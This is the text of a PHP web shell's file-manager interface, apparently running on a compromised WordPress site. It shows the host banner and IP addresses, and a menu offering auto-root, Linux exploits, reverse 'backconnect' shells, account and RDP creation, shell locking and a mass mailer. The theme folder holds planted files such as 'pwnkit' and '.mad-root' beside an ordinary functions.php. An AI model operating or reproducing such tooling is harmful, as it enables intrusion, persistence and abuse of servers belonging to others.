Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
themes /
agama-blue /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
README.md
2.33
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
functions.php
1.59
KB
-rw-r--r--
index.php
1009
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
screenshot.png
674.53
KB
-rw-r--r--
sidebar.php
1.14
KB
-rw-r--r--
style.css
3.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php // Do not allow direct access to the file. if( ! defined( 'ABSPATH' ) ) { exit; } // Include Customizer File get_template_part( 'includes/customizer' ); /** * Theme Setup * * @since 1.0 */ add_action( 'after_setup_theme', 'agama_blue_after_setup_theme' ); function agama_blue_after_setup_theme() { /** * THEME SETUP */ } /** * After Theme Switch * * @since 1.0.5 */ add_action( 'after_switch_theme', 'agamablue_setup_options' ); function agamablue_setup_options() { set_theme_mod( 'agama_primary_color', '#00a4d0' ); } /** * Enqueue Scripts * * Enqueue the Agama Blue scripts. * * @since 1.1.2 * @return void */ function agama_blue_enqueue_scripts() { wp_enqueue_script( 'agama-blue', get_stylesheet_directory_uri() . '/assets/js/agama-blue.js', [ 'jquery' ], '1.1.5' ); } add_action( 'wp_enqueue_scripts', 'agama_blue_enqueue_scripts' ); /** * Blog Heading * * Display the heading above blog posts. * * @since 1.1.2 * @return mixed */ function agama_blue_blog_heading() { $heading = get_theme_mod( 'agama_blue_blog_heading', __( 'Latest from the Blog', 'agama-blue' ) ); if ( $heading && is_home() ) : ?> <div class="section notopmargin notopborder section-blog"> <div class="tv-container clearfix"> <div class="heading-block center nomargin"> <h3><?php echo esc_html( $heading ); ?></h3> </div> </div> </div> <?php endif; } add_action( 'agama/before_content', 'agama_blue_blog_heading', 20 ); /* Omit closing PHP tag to avoid "Headers already sent" issues. */
Close